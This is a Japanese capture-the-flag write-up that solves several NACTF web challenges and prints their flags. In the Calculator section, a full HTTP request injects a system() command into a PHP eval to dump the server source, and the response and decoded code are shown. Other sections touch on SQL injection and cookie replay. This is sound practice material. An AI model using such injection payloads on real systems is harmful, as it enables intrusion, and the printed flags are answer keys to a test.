NACTF: Write up
Web
Missing Image
ソースコードに<img src="http://challenges.nactf.com/flag.png" alt="">
と書かれてるがこれはアクセスできない。
https://hidden.challenges.nactf.com/flag.png
に変えてアクセスするとflagが出てくる。
Login
適当にSQLインジェクションっぽい文字列打ってたらflag出てきて謎
flag: nactf{sQllllllll_1m5qpr8x}
Calculator
POST /index.php HTTP/1.1 Host: calculator.challenges.nactf.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ja,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 36 Origin: https://calculator.challenges.nactf.com Connection: close Referer: https://calculator.challenges.nactf.com/index.php Upgrade-Insecure-Requests: 1 input=system("cat+index.php|base64")
HTTP/1.1 200 OK Content-Length: 2157 Content-Type: text/html; charset=UTF-8 Date: Sun, 01 Nov 2020 04:56:05 GMT Server: Apache/2.4.38 (Debian) Vary: Accept-Encoding X-Powered-By: PHP/7.4.12 Connection: close <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <!-- Compiled and minified CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css"> <title>Calculator</title> </head> <body class="black"> <h1 class="center red-text" style="padding-bottom: 75px">The Best and Most Secure Calculator Ever</h1> <div class="container"> PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0 PSJVVEYtOCI+CiAgICA8IS0tIENvbXBpbGVkIGFuZCBtaW5pZmllZCBDU1MgLS0+CiAgICA8bGlu ayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWph eC9saWJzL21hdGVyaWFsaXplLzEuMC4wL2Nzcy9tYXRlcmlhbGl6ZS5taW4uY3NzIj4KCiAgICA8 dGl0bGU+Q2FsY3VsYXRvcjwvdGl0bGU+CjwvaGVhZD4KPGJvZHkgY2xhc3M9ImJsYWNrIj4KPGgx IGNsYXNzPSJjZW50ZXIgcmVkLXRleHQiIHN0eWxlPSJwYWRkaW5nLWJvdHRvbTogNzVweCI+VGhl IEJlc3QgYW5kIE1vc3QgU2VjdXJlIENhbGN1bGF0b3IgRXZlcjwvaDE+CjxkaXYgY2xhc3M9ImNv bnRhaW5lciI+CiAgICA8P3BocAogICAgJGZsYWcgPSAibmFjdGZ7ZXYxbF9ldmFsfSI7CiAgICBp ZiAoaXNzZXQoJF9QT1NUWyJpbnB1dCJdKSkgewogICAgICAgICRpbnB1dCA9ICRfUE9TVFsiaW5w dXQiXTsKICAgICAgICBlY2hvICc8ZGl2IGNsYXNzPSJjZW50ZXIgd2hpdGUtdGV4dCIgc3R5bGU9 InBhZGRpbmctYm90dG9tOiA1MHB4Ij48aDM+JyAuICRpbnB1dCAuICIgPSAiIC4gZXZhbCgicmV0 dXJuICgkaW5wdXQpOyIpIC4gJzwvaDM+PC9kaXY+JzsKICAgIH0KICAgID8+CiAgICA8Zm9ybSBh Y3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJpbnB1 dC1maWVsZCI+CiAgICAgICAgICAgIDxpbnB1dCBwbGFjZWhvbGRlcj0iVHlwZSBhbnkgZXhwcmVz c2lvbiEiIG5hbWU9ImlucHV0IiB0eXBlPSJ0ZXh0IiBjbGFzcz0id2hpdGUtdGV4dCI+CiAgICAg ICAgPC9kaXY+CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgY2xh c3M9ImJ0biI+CiAgICA8L2Zvcm0+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4= <div class="center white-text" style="padding-bottom: 50px"><h3>system("cat index.php|base64") = c3M9ImJ0biI+CiAgICA8L2Zvcm0+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4=</h3></div> <form action="index.php" method="post"> <div class="input-field"> <input placeholder="Type any expression!" name="input" type="text" class="white-text"> </div> <input type="submit" value="Submit" class="btn"> </form> </div> </body> </html>
$ echo -n 'PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9ImVuIj4KPGhlYWQ+CiAgICA8bWV0YSBjaGFyc2V0 PSJVVEYtOCI+CiAgICA8IS0tIENvbXBpbGVkIGFuZCBtaW5pZmllZCBDU1MgLS0+CiAgICA8bGlu ayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWph eC9saWJzL21hdGVyaWFsaXplLzEuMC4wL2Nzcy9tYXRlcmlhbGl6ZS5taW4uY3NzIj4KCiAgICA8 dGl0bGU+Q2FsY3VsYXRvcjwvdGl0bGU+CjwvaGVhZD4KPGJvZHkgY2xhc3M9ImJsYWNrIj4KPGgx IGNsYXNzPSJjZW50ZXIgcmVkLXRleHQiIHN0eWxlPSJwYWRkaW5nLWJvdHRvbTogNzVweCI+VGhl IEJlc3QgYW5kIE1vc3QgU2VjdXJlIENhbGN1bGF0b3IgRXZlcjwvaDE+CjxkaXYgY2xhc3M9ImNv bnRhaW5lciI+CiAgICA8P3BocAogICAgJGZsYWcgPSAibmFjdGZ7ZXYxbF9ldmFsfSI7CiAgICBp ZiAoaXNzZXQoJF9QT1NUWyJpbnB1dCJdKSkgewogICAgICAgICRpbnB1dCA9ICRfUE9TVFsiaW5w dXQiXTsKICAgICAgICBlY2hvICc8ZGl2IGNsYXNzPSJjZW50ZXIgd2hpdGUtdGV4dCIgc3R5bGU9 InBhZGRpbmctYm90dG9tOiA1MHB4Ij48aDM+JyAuICRpbnB1dCAuICIgPSAiIC4gZXZhbCgicmV0 dXJuICgkaW5wdXQpOyIpIC4gJzwvaDM+PC9kaXY+JzsKICAgIH0KICAgID8+CiAgICA8Zm9ybSBh Y3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJpbnB1 dC1maWVsZCI+CiAgICAgICAgICAgIDxpbnB1dCBwbGFjZWhvbGRlcj0iVHlwZSBhbnkgZXhwcmVz c2lvbiEiIG5hbWU9ImlucHV0IiB0eXBlPSJ0ZXh0IiBjbGFzcz0id2hpdGUtdGV4dCI+CiAgICAg ICAgPC9kaXY+CiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlN1Ym1pdCIgY2xh c3M9ImJ0biI+CiAgICA8L2Zvcm0+CjwvZGl2Pgo8L2JvZHk+CjwvaHRtbD4=' | base64 -d <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <!-- Compiled and minified CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css"> <title>Calculator</title> </head> <body class="black"> <h1 class="center red-text" style="padding-bottom: 75px">The Best and Most Secure Calculator Ever</h1> <div class="container"> <?php $flag = "nactf{ev1l_eval}"; if (isset($_POST["input"])) { $input = $_POST["input"]; echo '<div class="center white-text" style="padding-bottom: 50px"><h3>' . $input . " = " . eval("return ($input);") . '</h3></div>'; } ?> <form action="index.php" method="post"> <div class="input-field"> <input placeholder="Type any expression!" name="input" type="text" class="white-text"> </div> <input type="submit" value="Submit" class="btn"> </form> </div> </body> </html>
Cookie Recipe
index.php
にアクセスするとCookieが返ってきてることにきづく
HTTP/1.1 200 OK Date: Sun, 01 Nov 2020 05:02:13 GMT Server: Apache X-Powered-By: PHP/7.3.23 Set-Cookie: user=cookie_lover; expires=Sun, 01-Nov-2020 05:02:14 GMT; Max-Age=1; path=/index.php Vary: Accept-Encoding Content-Length: 954 Content-Type: text/html; charset=UTF-8 Connection: close <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Cookie Recipe</title> <!-- Compiled and minified CSS --> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css"> <!--Import Google Icon Font--> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet"> </head> <body> <div class="section container"> <h3>Login to see the family recipe!</h3> <form action="auth.php" method="post"> <div class="input-field"> <input placeholder="Username" name="username" type="text"> </div> <div class="input-field"> <input placeholder="Password" name="password" type="text"> </div> <input type="submit" name="submit" value="submit" class="btn"> </form> </div> <img src="cookies.jpg" alt="" class="center" style="max-width: 100%; height: auto;"> </body> </html>
そのCookieをつけてauth.php
にアクセスするだけ。
Forms
フロント側でJavaScriptつかって解く問題かと思ったらソースコードの最後に
<script type="text/javascript"> function verify() { user = document.getElementById("username").value; pass = document.getElementById("password").value; if (user === "admin" && pass === "password123") { document.getElementById("submit").value = "correct_login"; } else { document.getElementById("submit").value = "false"; } document.form.submit(); } </script>
と書いてあってusername=admin&password=password123&submit=correct_login
でPOSTするだけということがわかる。
<div class="container" style="padding-top: 100px"> <div class="card-panel blue lighten-2 center"> <h3> Successful Login! </h3> <h5> Flag: nactf{cl13n75_ar3_3v11} </h5> </div> </div>